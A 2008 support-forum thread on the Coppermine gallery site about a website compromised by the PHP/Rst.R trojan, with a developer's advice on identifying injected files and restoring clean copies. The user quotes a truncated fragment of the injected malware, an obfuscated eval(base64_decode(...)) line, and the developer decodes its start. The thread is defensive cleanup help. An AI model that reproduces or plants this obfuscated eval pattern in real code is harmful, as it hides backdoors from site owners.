PHP/Rst.R trojan - cpg v. 1.4.1 PHP/Rst.R trojan - cpg v. 1.4.1
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

PHP/Rst.R trojan - cpg v. 1.4.1

Started by TheGM, September 05, 2008, 06:28:33 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

TheGM

Hi All,

I recently discovered that my website was hacked and a number of php files in gallery script corrupted by what the antivirus calls a variant of the PHP/Rst.R trojan virus.

A friend looked at the infected files and they appear to have totally destroyed.

As I recently took over from the webmaster that created the site I don't have the original files that came with that particular version of the software that I could use to replace the infected ones.

Would anyone here know how to fix this problem? As you can guess I have very little knowledge on the subject.

I looked at upgrading the gallery software but I cannot see replacement files in the newer version...

Any help and advice would be greatly appreciated.

Thanks in advance and all the best,
Cristina

Joachim Müller


TheGM

You are a superstar, thank you ever so much.   :-*

Following your instructions right now, please don't close this thread just yet...  just in case   :)


Thank you again,
Cristina

Joachim Müller

Marking the thread as "solved" (that's what you could have done by yourself using the tick icon in your initial posting), but you can still reply here.

TheGM

ha!  I am going through your guide for solving this problem and after comparing the two sets of scripts with WinMerge have come across some odd looking files. I was wondering if you could clarify something for me.

most of the PHP files when opened have some coding with seems like syntax and rules, etc. but some others have only got garbled content (for example: "<?php error_reporting(0);$p="baaebzzazbzjzgfzb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9P") - others have what looks like a code that points to the 'base64 decode' mentioned in the garbled message. Do I assume that these files have been hacked?

I don't even know if these files are supposed to be in the directories that I found them in and they certainly were not replaced by the upgrade. PLUS there are a couple of files in the albums directory that I know for a fact have been hacked but can't find replacements for them nor I can open them (AV won't let me even when I switch it off).

Here are two files that have been tagged as malicious, would you be able to tell me if they should even exist?

/albums/Members-goodies-sale/docs/configs_dist.php   
/albums/faq.php                                                     

Thank you ever so much,
Cristina (with smoke coming out of my ears)

Joachim Müller

Do as I suggested in the sanitization thread: get rid of all PHP files that don't belong on the server. Re-upload clean coppermine files (most recent stable release) and you'll be fine. Yes, the code you just posted doesn't exist in a vanilla copy of a coppermine file, so it's likely that it's a hack. The stuff that get's executed is class newhttp{ protected $fullurl; protected $p_url; protected $conn_id; protected $flushed; protected $mode = 4; protected $defmode; protected $redirects = 0; protected $binary; protected $options; protected $stat = array('dev' =, so yes: that's attacking code.

Did I mention that being hacked if you're running cpg1.4.1 (i.e. 18 versions behind the most recent stable release) comes naturally. It's like asking for punishment.

From the sanitization thread:
Quote from: Joachim Müller on April 15, 2008, 04:55:00 PM
No support
I'm not ready to support this thread, it comes as-is, as a courtesy for those who find it helpful. Please do not start new threads that refer to this thread with further question. Under no circumstances are you allowed to contact me individually (by PM or email).
This means: no more questions on this subject.

TheGM